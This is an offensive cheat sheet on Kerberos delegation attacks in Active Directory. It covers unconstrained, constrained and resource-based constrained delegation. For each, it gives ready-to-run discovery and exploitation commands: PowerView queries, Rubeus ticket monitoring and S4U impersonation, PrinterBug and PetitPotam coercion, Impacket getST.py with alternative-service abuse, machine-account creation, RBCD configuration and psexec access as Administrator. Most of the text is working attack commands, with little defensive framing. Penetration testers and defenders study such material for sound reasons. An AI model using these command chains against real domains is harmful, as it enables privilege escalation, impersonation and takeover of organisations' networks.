Delegation Attacks
Kerberos delegation allows a service to impersonate a user to access other resources. Misconfigurations in delegation settings can lead to privilege escalation and lateral movement.
Unconstrained Delegation
Servers with Unconstrained Delegation enabled store the TGT of any user that authenticates to them in memory. If an attacker compromises such a server, they can extract these TGTs.
Discovery
Identify computers with Unconstrained Delegation enabled.
PowerView:
Get-DomainComputer -Unconstrained | Select-Object name,dnshostnameActiveDirectory Module:
Get-ADComputer -Filter {TrustedForDelegation -eq $true}Exploitation
Coerce authentication from a high-value target (like a Domain Controller) to the compromised server. Monitor for the incoming TGT.
On compromised server, run Rubeus to monitor for TGTs:
.\Rubeus.exe monitor /interval:5Trigger authentication from DC (PrinterBug):
SpoolSample.exe DC01.corp.local COMPROMISED_SERVER.corp.localOr using PetitPotam:
python3 PetitPotam.py COMPROMISED_SERVER DC01.corp.localUse the captured TGT:
.\Rubeus.exe ptt /ticket:BASE64_TICKETConstrained Delegation
Constrained Delegation restricts which services a server can delegate to. However, if an attacker compromises the account with constrained delegation, they can impersonate *any* user to the allowed services.
Discovery
Find users or computers trusted for constrained delegation.
Get-DomainUser -TrustedToAuth | Select-Object samaccountname,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | Select-Object name,msds-allowedtodelegatetoExploitation
Using the hash of the compromised service account, request a TGS for a high-privileged user (e.g., Administrator) to the allowed service.
Using Rubeus (with hash):
.\Rubeus.exe s4u /user:SERVICE_ACCOUNT /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/fileserver.corp.local /pttUsing Impacket:
getST.py -spn cifs/fileserver.corp.local -impersonate Administrator corp.local/service_account:passwordAlternative Service
If the allowed SPN is not the one you want (e.g., HTTP instead of CIFS), but it's on the same server, you can often modify the service name in the request.
Request to HTTP but use for CIFS on same host:
getST.py -spn http/server.corp.local -impersonate Administrator corp.local/service_account:password -altservice cifs/server.corp.localResource-Based Constrained Delegation (RBCD)
RBCD is configured on the target object rather than the delegating object. It allows an object to specify who can delegate to it. Attackers with write access to a computer object can configure RBCD to gain administrative access.
Prerequisites
1. Write access to the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
2. Control of an account with an SPN (a machine account works).
Check if you have write access:
Get-DomainComputer TARGET_SERVER | Select-Object -ExpandProperty ntsecuritydescriptor |
Select-Object -ExpandProperty Access | Where-Object {$_.IdentityReference -match "your_user"}Exploitation Steps
Create a machine account (if needed), configure RBCD on the target, and then request a service ticket.
Create machine account (if MAQ > 0):
New-MachineAccount -MachineAccount YOURCOMPUTER -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force)Or use Impacket:
addcomputer.py -computer-name YOURCOMPUTER -computer-pass 'Password123!' corp.local/user:passwordSet RBCD on target:
Set-ADComputer TARGET_SERVER -PrincipalsAllowedToDelegateToAccount YOURCOMPUTER$Request ticket using your machine account:
getST.py -spn cifs/TARGET_SERVER.corp.local -impersonate Administrator corp.local/YOURCOMPUTER$:'Password123!'Use ticket:
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@TARGET_SERVER.corp.local